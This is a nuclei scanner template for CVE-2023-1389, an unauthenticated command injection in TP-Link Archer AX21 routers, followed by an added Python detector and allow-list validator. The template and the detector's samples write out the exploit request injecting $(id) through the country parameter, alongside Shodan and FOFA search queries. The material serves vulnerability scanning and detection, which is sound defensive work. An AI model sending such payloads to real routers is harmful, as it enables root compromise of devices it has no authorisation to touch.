Vulnerability Description
TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
id: CVE-2023-1389

info:
  name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
  remediation: |
    Update to the latest firmware version provided by TP-Link.
  reference:
    - https://www.tenable.com/security/research/tra-2023-11
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1389
    - https://github.com/tenable/poc-cve-2023-1389
  classification:
    cve-id: CVE-2023-1389
    cwe-id: CWE-78
    epss-score: 0.93818
    epss-percentile: 0.99859
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: tp-link
    product: archer-ax21
    fofa-query: body="tp-link"
    shodan-query: 'title:"TP-Link Router"'
    verified: true
  tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev

http:
  - raw:
      - |
        POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=write&country=$(id)

      - |
        POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=write&country=$(id)

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008b14297845ae3a35d659952c4d6f3fb48fa77275cfb76e5c22e488ba3b56ed02022100a67d3c7d63605ce0cb0837bd60dfa38cd177fb1a05d44d00a6839012e57dd36f:922c64590222798bb761d5b6d8e72950
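The template above identifies vulnerable devices by sending the write request and matching the command output in the response. On the defending side the same request shape is what a reverse proxy, IDS or honeypot in front of the router's management interface would see, and the fix on the firmware side is an allow-list on the country value. The following is an added example, not part of the nuclei template, of TP-Link firmware, or of any vendor tooling: it parses raw HTTP/1.1 requests, flags a locale form write whose stok token is empty or whose country value is not a plain country code, and exposes the allow-list check a hardened handler would apply. The sample requests are constructed, and the stok value in the benign one is a placeholder.

```python
"""Detection and validation helper for the CVE-2023-1389 request pattern.

Added example (assumed log/capture format); not code from the nuclei template,
TP-Link firmware, or any vendor tool.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Path shape used by the template above: /cgi-bin/luci/;stok=<token>/locale
LOCALE_PATH_RE = re.compile(r"^/cgi-bin/luci/;stok=(?P<stok>[^/]*)/locale$")

# A legitimate value for this form is a short alphabetic country code (e.g. "US").
SAFE_COUNTRY_RE = re.compile(r"^[A-Za-z]{2,3}$")

# Characters that only make sense if the value is intended to reach a shell.
SHELL_META_RE = re.compile(r"[$`;|&<>(){}\n]")


def parse_raw_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)  # urlsplit keeps the ";stok=..." segment in the path
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qs(parts.query),
        "headers": headers,
        "body": body.strip(),
    }


def is_valid_country(value: str) -> bool:
    """Allow-list check: the only values the locale form should ever accept."""
    return SAFE_COUNTRY_RE.fullmatch(value) is not None


def assess_request(raw: str) -> dict:
    """Return findings for one request; 'suspicious' is True when it matches
    the exploitation pattern used by the template above."""
    req = parse_raw_request(raw)
    findings = []
    m = LOCALE_PATH_RE.match(req["path"])
    if not m or req["query"].get("form") != ["country"]:
        return {"suspicious": False, "country": None, "findings": findings}
    params = parse_qs(req["body"], keep_blank_values=True)
    operation = params.get("operation", [""])[0]
    country = params.get("country", [""])[0]
    if operation != "write":
        return {"suspicious": False, "country": country, "findings": findings}
    if m.group("stok") == "":
        findings.append("locale form write with an empty stok token (no session)")
    if not is_valid_country(country):
        findings.append("country value is not a country code: %r" % country)
        if SHELL_META_RE.search(country):
            findings.append("country value contains shell metacharacters")
    return {"suspicious": bool(findings), "country": country, "findings": findings}


# Constructed sample requests (CRLF-framed, as captured on the wire).
EXPLOIT_ATTEMPT = "\r\n".join([
    "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1",
    "Host: 192.0.2.1",
    "Content-Type: application/x-www-form-urlencoded",
    "",
    "operation=write&country=$(id)",
])
ENCODED_ATTEMPT = EXPLOIT_ATTEMPT.replace("$(id)", "%24%28id%29")
BENIGN_WRITE = "\r\n".join([
    "POST /cgi-bin/luci/;stok=abcdef0123456789/locale?form=country HTTP/1.1",  # placeholder token
    "Host: 192.0.2.1",
    "Content-Type: application/x-www-form-urlencoded",
    "",
    "operation=write&country=US",
])

if __name__ == "__main__":
    for label, sample in [("exploit", EXPLOIT_ATTEMPT), ("encoded", ENCODED_ATTEMPT), ("benign", BENIGN_WRITE)]:
        print(label, assess_request(sample))
```

The allow-list in `is_valid_country` is the mitigation side of the same finding: a handler that rejects anything but a two- or three-letter code never passes `$(id)` to a shell, whatever quoting the caller uses. Percent-encoded variants are decoded by `parse_qs` before the check, so the detector does not depend on the attacker sending the literal characters.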